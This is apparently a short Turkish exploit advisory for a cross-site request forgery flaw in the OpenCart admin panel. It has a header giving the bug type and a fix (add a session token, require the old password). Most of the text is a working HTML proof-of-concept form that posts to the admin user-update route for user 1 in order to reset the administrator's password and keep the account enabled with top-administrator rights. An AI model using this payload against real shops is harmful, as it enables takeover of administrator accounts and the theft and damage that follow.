< ------------------- header data start ------------------- >

#############################################################

# Application Name : Open Cart

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirebilir ..

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,Eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >





<form action=http://demo.opencart.com/admin/index.php?route=user/user/update&user_id=1 method=post enctype=multipart/form-data id=form>

<div id=tab_general class=page>

<table class=form>

<tr>

<td width=25%><span class=required>*</span> username:</td>

<td><input type=text name=username value=admin />

<br />

</td>

</tr>

<tr>

<td><span class=required>*</span> First Name:</td>

<td><input type=text name=firstname value= />

<br />

</td>

</tr>

<tr>

<td><span class=required>*</span> Last Name:</td>

<td><input type=text name=lastname value= />

<br />

</td>

</tr>

<tr>

<td>E-Mail:</td>

<td><input type=text name=email value= /></td>

</tr>

<tr>

<td>User Group:</td>

<td><select name=user_group_id>

<option value=10>Demonstration</option>

<option value=1 selected=selected>Top Administrator</option>

</select></td>

</tr>

<tr>

<td>password:</td>

<td><input type=password name=password value= />

<br />

</td>

</tr>

<tr>

<td>Confirm:</td>

<td><input type=password name=confirm value= />

<br />

</td>

</tr>

<tr>

<td>Status:</td>

<td><select name=status>

<option value=0>Disabled</option>

<option value=1 selected=selected>Enabled</option>

</select></td>

</tr>

</table>

</div>

<input type = submit value = Kaydet>

</form>

< -- bug code end of -- >